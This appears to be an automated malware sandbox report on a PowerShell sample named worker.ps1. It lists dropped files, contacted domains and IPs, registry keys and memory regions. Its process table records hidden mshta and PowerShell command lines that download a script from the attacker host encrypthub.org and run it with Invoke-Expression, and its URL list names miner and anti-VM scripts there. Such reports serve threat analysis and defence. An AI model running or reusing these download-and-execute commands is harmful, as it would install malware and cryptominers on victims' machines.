Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
worker.ps1
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]
|
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z4rx4y2.yw1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avbweish.mao.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cavkz4hm.jmx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cubd5jwc.aoa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osqccazu.2jz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1h5byu0.ukl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmkez3be.434.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjf1e20i.3ey.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TDX29LR7SDG7X5WGAY6P.temp
|
data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1"
|
|
|
|
C:\Windows\System32\mshta.exe
|
mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close)
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://encrypthub.org/main/zakrep/worker.ps1
|
unknown
|
|
|
|
https://encrypthub.org
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://encrypthub.org
|
unknown
|
||
|
https://ident.me/
|
49.12.234.183
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microcG.l.
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://ident.me/p
|
unknown
|
||
|
http://ip-api.com/json
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://encrypthub.org:8080
|
unknown
|
||
|
http://ident.me
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://encrypthub.org/panel/
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ifconfig.me
|
unknown
|
||
|
https://ident.me
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://encrypthub.org/main/antivm.ps1
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://encrypthub.org/main/marko/miner.ps1
|
unknown
|
||
|
http://crl.micros
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
encrypthub.org
|
146.70.233.10
|
|
|
|
ident.me
|
49.12.234.183
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
146.70.233.10
|
encrypthub.org
|
United Kingdom
|
|
|
|
49.12.234.183
|
ident.me
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
279C2F68000
|
trusted library allocation
|
page read and write
|
|
|
|
1B13765F000
|
heap
|
page read and write
|
||
|
FE0CDFB000
|
stack
|
page read and write
|
||
|
1B1376DE000
|
heap
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B1376FE000
|
heap
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1F2BDF7E000
|
heap
|
page read and write
|
||
|
1B137773000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
279C2890000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
279DB058000
|
heap
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
1B1376DE000
|
heap
|
page read and write
|
||
|
7DF437F90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
DE71CFE000
|
stack
|
page read and write
|
||
|
7FFD9BD20000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFB8C000
|
trusted library allocation
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
279C0EBB000
|
heap
|
page read and write
|
||
|
1B137853000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
1A934D70000
|
heap
|
page read and write
|
||
|
1B137657000
|
heap
|
page read and write
|
||
|
279C28D0000
|
heap
|
page execute and read and write
|
||
|
1F2BDF6E000
|
heap
|
page read and write
|
||
|
1B137850000
|
heap
|
page read and write
|
||
|
279DB250000
|
trusted library allocation
|
page read and write
|
||
|
1B1377A9000
|
heap
|
page read and write
|
||
|
1B137708000
|
heap
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
1A934E0B000
|
heap
|
page read and write
|
||
|
279DB624000
|
heap
|
page read and write
|
||
|
1F2BFFAE000
|
trusted library allocation
|
page read and write
|
||
|
1B137664000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1B1386F0000
|
heap
|
page read and write
|
||
|
1A934E6E000
|
heap
|
page read and write
|
||
|
279C4860000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
279DB641000
|
heap
|
page read and write
|
||
|
279DB0B2000
|
heap
|
page read and write
|
||
|
1A934E6E000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F2D7FE5000
|
heap
|
page read and write
|
||
|
FE0CD7C000
|
stack
|
page read and write
|
||
|
1B1377D0000
|
heap
|
page read and write
|
||
|
1B137683000
|
heap
|
page read and write
|
||
|
279C1180000
|
heap
|
page read and write
|
||
|
FE0D94B000
|
stack
|
page read and write
|
||
|
279C27FB000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
1B1377BF000
|
heap
|
page read and write
|
||
|
FE0C9FB000
|
stack
|
page read and write
|
||
|
7FFD9B734000
|
trusted library allocation
|
page read and write
|
||
|
279DB0FB000
|
heap
|
page read and write
|
||
|
1F2BFED2000
|
trusted library allocation
|
page read and write
|
||
|
FE0C8FE000
|
stack
|
page read and write
|
||
|
1B1377BC000
|
heap
|
page read and write
|
||
|
279C27E0000
|
trusted library allocation
|
page read and write
|
||
|
279DB230000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
1B137632000
|
heap
|
page read and write
|
||
|
1A934E23000
|
heap
|
page read and write
|
||
|
1A934D89000
|
heap
|
page read and write
|
||
|
279C0DD0000
|
heap
|
page read and write
|
||
|
1B137654000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
279C3F5C000
|
trusted library allocation
|
page read and write
|
||
|
279C28E8000
|
heap
|
page read and write
|
||
|
1A934F50000
|
heap
|
page read and write
|
||
|
1B13785C000
|
heap
|
page read and write
|
||
|
7DF493020000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B13765A000
|
heap
|
page read and write
|
||
|
1B1376E1000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
1B13765A000
|
heap
|
page read and write
|
||
|
1F2BDED0000
|
heap
|
page read and write
|
||
|
279DB064000
|
heap
|
page read and write
|
||
|
1F2BFAB8000
|
trusted library allocation
|
page read and write
|
||
|
1F2D7F5A000
|
heap
|
page read and write
|
||
|
FE0D9CE000
|
stack
|
page read and write
|
||
|
DE71C7E000
|
stack
|
page read and write
|
||
|
1F2BFFAA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
FE0C36E000
|
stack
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
1A934E70000
|
heap
|
page read and write
|
||
|
1F2D7EE0000
|
heap
|
page execute and read and write
|
||
|
785A9FE000
|
stack
|
page read and write
|
||
|
1B13770C000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA94000
|
trusted library allocation
|
page read and write
|
||
|
279C5094000
|
trusted library allocation
|
page read and write
|
||
|
279C0E76000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1A934E0E000
|
heap
|
page read and write
|
||
|
279C4A95000
|
trusted library allocation
|
page read and write
|
||
|
FE0C77C000
|
stack
|
page read and write
|
||
|
1B137604000
|
heap
|
page read and write
|
||
|
279C0EB7000
|
heap
|
page read and write
|
||
|
1A936A8D000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
1A934E62000
|
heap
|
page read and write
|
||
|
1B138535000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFB9D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
279D2DAF000
|
trusted library allocation
|
page read and write
|
||
|
1B1377C8000
|
heap
|
page read and write
|
||
|
7FFD9BBF4000
|
trusted library allocation
|
page read and write
|
||
|
1B137756000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
279C40C2000
|
trusted library allocation
|
page read and write
|
||
|
279DB5B0000
|
heap
|
page read and write
|
||
|
1F2BDF6A000
|
heap
|
page read and write
|
||
|
279D3047000
|
trusted library allocation
|
page read and write
|
||
|
1B1377E6000
|
heap
|
page read and write
|
||
|
279C27B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B1376E0000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
1A934E44000
|
heap
|
page read and write
|
||
|
DE713AE000
|
stack
|
page read and write
|
||
|
7FFD9B730000
|
trusted library allocation
|
page read and write
|
||
|
7859FFE000
|
stack
|
page read and write
|
||
|
1F2BFB86000
|
trusted library allocation
|
page read and write
|
||
|
1F2BDFA5000
|
heap
|
page read and write
|
||
|
1A9350D0000
|
trusted library allocation
|
page read and write
|
||
|
279DB9B0000
|
heap
|
page read and write
|
||
|
DE71AFE000
|
stack
|
page read and write
|
||
|
279C2850000
|
trusted library allocation
|
page read and write
|
||
|
1B1377BC000
|
heap
|
page read and write
|
||
|
FE0CBF9000
|
stack
|
page read and write
|
||
|
1F2BF870000
|
heap
|
page readonly
|
||
|
1B137876000
|
heap
|
page read and write
|
||
|
1B137701000
|
heap
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
|
279DB219000
|
heap
|
page read and write
|
||
|
1B138530000
|
trusted library allocation
|
page read and write
|
||
|
1B1377BC000
|
heap
|
page read and write
|
||
|
7FFD9BA99000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E1000
|
trusted library allocation
|
page read and write
|
||
|
FE0C325000
|
stack
|
page read and write
|
||
|
279C2DC7000
|
trusted library allocation
|
page read and write
|
||
|
1A934E68000
|
heap
|
page read and write
|
||
|
279C0E6E000
|
heap
|
page read and write
|
||
|
7FFD9B73D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A934E6E000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFA60000
|
heap
|
page read and write
|
||
|
1A934F70000
|
heap
|
page read and write
|
||
|
1F2BFB9A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD30000
|
trusted library allocation
|
page read and write
|
||
|
1B1376E9000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1B137685000
|
heap
|
page read and write
|
||
|
279DAF50000
|
heap
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
1B13782D000
|
heap
|
page read and write
|
||
|
FE0E10A000
|
stack
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
279C27C0000
|
trusted library section
|
page read and write
|
||
|
279C0E78000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
1F2BDF60000
|
heap
|
page read and write
|
||
|
279DB225000
|
heap
|
page read and write
|
||
|
279DB238000
|
heap
|
page read and write
|
||
|
279DADFA000
|
heap
|
page read and write
|
||
|
279C43A7000
|
trusted library allocation
|
page read and write
|
||
|
1F2BE080000
|
heap
|
page read and write
|
||
|
1F2BE030000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
|
279D302D000
|
trusted library allocation
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
1A934E07000
|
heap
|
page read and write
|
||
|
1B137838000
|
heap
|
page read and write
|
||
|
279DADC7000
|
heap
|
page read and write
|
||
|
DE71D7B000
|
stack
|
page read and write
|
||
|
279C4B7F000
|
trusted library allocation
|
page read and write
|
||
|
279DAE2D000
|
heap
|
page read and write
|
||
|
1F2BFF63000
|
trusted library allocation
|
page read and write
|
||
|
1A934D98000
|
heap
|
page read and write
|
||
|
7FFD9BC76000
|
trusted library allocation
|
page read and write
|
||
|
279C29F0000
|
heap
|
page read and write
|
||
|
1B137800000
|
heap
|
page read and write
|
||
|
279C5084000
|
trusted library allocation
|
page read and write
|
||
|
1B1376DE000
|
heap
|
page read and write
|
||
|
1B1377A3000
|
heap
|
page read and write
|
||
|
1B13785E000
|
heap
|
page read and write
|
||
|
1F2BE0A0000
|
trusted library allocation
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
7DF493040000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
1B137827000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
279C3B16000
|
trusted library allocation
|
page read and write
|
||
|
279C0E7C000
|
heap
|
page read and write
|
||
|
1B13765B000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1F2BDF5E000
|
heap
|
page read and write
|
||
|
1F2BFB92000
|
trusted library allocation
|
page read and write
|
||
|
1B13776E000
|
heap
|
page read and write
|
||
|
7FFD9B78C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B137826000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1A934DBF000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1B1378A6000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B744000
|
trusted library allocation
|
page read and write
|
||
|
1F2BE084000
|
heap
|
page read and write
|
||
|
1A934DBF000
|
heap
|
page read and write
|
||
|
279D302F000
|
trusted library allocation
|
page read and write
|
||
|
279C409F000
|
trusted library allocation
|
page read and write
|
||
|
279C4602000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC82000
|
trusted library allocation
|
page read and write
|
||
|
279C2D41000
|
trusted library allocation
|
page read and write
|
||
|
1F2BE00E000
|
heap
|
page read and write
|
||
|
1F2BDEF0000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
279C4C3E000
|
trusted library allocation
|
page read and write
|
||
|
279C0E7E000
|
heap
|
page read and write
|
||
|
7FFD9BB14000
|
trusted library allocation
|
page read and write
|
||
|
1B13781C000
|
heap
|
page read and write
|
||
|
1F2BDF20000
|
heap
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFADE000
|
trusted library allocation
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
785A4FD000
|
stack
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
1B1376DE000
|
heap
|
page read and write
|
||
|
1A935100000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
785A5FE000
|
stack
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
1B13781F000
|
heap
|
page read and write
|
||
|
1B137676000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC78000
|
trusted library allocation
|
page read and write
|
||
|
1A936A50000
|
heap
|
page read and write
|
||
|
785A7FB000
|
stack
|
page read and write
|
||
|
1B13786A000
|
heap
|
page read and write
|
||
|
279C1185000
|
heap
|
page read and write
|
||
|
279DAD8C000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1B13782E000
|
heap
|
page read and write
|
||
|
279DAD40000
|
heap
|
page read and write
|
||
|
7FFD9B74B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB12000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
7859EF5000
|
stack
|
page read and write
|
||
|
1B137652000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B1377C8000
|
heap
|
page read and write
|
||
|
7FFD9B733000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B13780F000
|
heap
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC46000
|
trusted library allocation
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
1B1378D0000
|
heap
|
page read and write
|
||
|
279C40B2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B1375E1000
|
heap
|
page read and write
|
||
|
279DAD70000
|
heap
|
page read and write
|
||
|
1A934FC9000
|
heap
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1B1376A1000
|
heap
|
page read and write
|
||
|
279C4837000
|
trusted library allocation
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
DE7187E000
|
stack
|
page read and write
|
||
|
1B137740000
|
heap
|
page read and write
|
||
|
1B1376C9000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
1A934DB0000
|
heap
|
page read and write
|
||
|
1B13786C000
|
heap
|
page read and write
|
||
|
7FFD9B740000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B742000
|
trusted library allocation
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1B137765000
|
heap
|
page read and write
|
||
|
7FFD9BBA6000
|
trusted library allocation
|
page read and write
|
||
|
279DB772000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
FE0E00B000
|
stack
|
page read and write
|
||
|
1F2BDDF0000
|
heap
|
page read and write
|
||
|
1F2BFABB000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFF50000
|
trusted library allocation
|
page read and write
|
||
|
1B1376C4000
|
heap
|
page read and write
|
||
|
1A934DCD000
|
heap
|
page read and write
|
||
|
7FFD9B8EA000
|
trusted library allocation
|
page read and write
|
||
|
1F2D7F94000
|
heap
|
page read and write
|
||
|
7FFD9B8F1000
|
trusted library allocation
|
page read and write
|
||
|
1F2BDFA9000
|
heap
|
page read and write
|
||
|
279DAEB0000
|
heap
|
page execute and read and write
|
||
|
1B137793000
|
heap
|
page read and write
|
||
|
279DB054000
|
heap
|
page read and write
|
||
|
1F2CFA71000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1B137795000
|
heap
|
page read and write
|
||
|
1A936A84000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
FE0E08B000
|
stack
|
page read and write
|
||
|
7FFD9B8D2000
|
trusted library allocation
|
page read and write
|
||
|
1B137677000
|
heap
|
page read and write
|
||
|
FE0D84F000
|
stack
|
page read and write
|
||
|
1B1378AA000
|
heap
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
1B137654000
|
heap
|
page read and write
|
||
|
1B137654000
|
heap
|
page read and write
|
||
|
7FFD9BC5A000
|
trusted library allocation
|
page read and write
|
||
|
279DB092000
|
heap
|
page read and write
|
||
|
1B1377C9000
|
heap
|
page read and write
|
||
|
279C4C03000
|
trusted library allocation
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
1B138130000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
279D3037000
|
trusted library allocation
|
page read and write
|
||
|
785A0FE000
|
stack
|
page read and write
|
||
|
279C40AE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC6F000
|
trusted library allocation
|
page read and write
|
||
|
DE7177D000
|
stack
|
page read and write
|
||
|
279DB2A0000
|
heap
|
page read and write
|
||
|
FE0C97E000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1F2CFA80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1A934DB0000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F2D7F4D000
|
heap
|
page read and write
|
||
|
7FFD9B7E6000
|
trusted library allocation
|
page read and write
|
||
|
279DB602000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
1F2BFA93000
|
trusted library allocation
|
page read and write
|
||
|
1B13775E000
|
heap
|
page read and write
|
||
|
7FFD9BC23000
|
trusted library allocation
|
page read and write
|
||
|
1B137870000
|
heap
|
page read and write
|
||
|
279DADC9000
|
heap
|
page read and write
|
||
|
279C3D2E000
|
trusted library allocation
|
page read and write
|
||
|
DE716FF000
|
stack
|
page read and write
|
||
|
FE0DD8B000
|
stack
|
page read and write
|
||
|
7FFD9B7FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
279C0D50000
|
heap
|
page read and write
|
||
|
279C40BC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
FE0CE7C000
|
stack
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
1B137674000
|
heap
|
page read and write
|
||
|
1B137755000
|
heap
|
page read and write
|
||
|
279DAD89000
|
heap
|
page read and write
|
||
|
1F2D7FD8000
|
heap
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
279DB030000
|
heap
|
page execute and read and write
|
||
|
279DB1B8000
|
heap
|
page read and write
|
||
|
1B13765E000
|
heap
|
page read and write
|
||
|
1B1377EC000
|
heap
|
page read and write
|
||
|
1F2BFEDA000
|
trusted library allocation
|
page read and write
|
||
|
279C0E72000
|
heap
|
page read and write
|
||
|
1F2D7FCA000
|
heap
|
page read and write
|
||
|
FE0D8CB000
|
stack
|
page read and write
|
||
|
1B13781C000
|
heap
|
page read and write
|
||
|
279DB068000
|
heap
|
page read and write
|
||
|
7FFD9BAA8000
|
trusted library allocation
|
page read and write
|
||
|
1B1370A0000
|
heap
|
page read and write
|
||
|
FE0CB79000
|
stack
|
page read and write
|
||
|
1B137808000
|
heap
|
page read and write
|
||
|
279C40B4000
|
trusted library allocation
|
page read and write
|
||
|
279DAEB7000
|
heap
|
page execute and read and write
|
||
|
7FFD9BB0D000
|
trusted library allocation
|
page read and write
|
||
|
279D3028000
|
trusted library allocation
|
page read and write
|
||
|
1B137709000
|
heap
|
page read and write
|
||
|
1B1378D9000
|
heap
|
page read and write
|
||
|
DE71976000
|
stack
|
page read and write
|
||
|
1B137633000
|
heap
|
page read and write
|
||
|
1B13781C000
|
heap
|
page read and write
|
||
|
1A934E61000
|
heap
|
page read and write
|
||
|
1A934E6E000
|
heap
|
page read and write
|
||
|
1A9369C0000
|
heap
|
page read and write
|
||
|
1F2BFF95000
|
trusted library allocation
|
page read and write
|
||
|
DE71BFE000
|
stack
|
page read and write
|
||
|
1B137651000
|
heap
|
page read and write
|
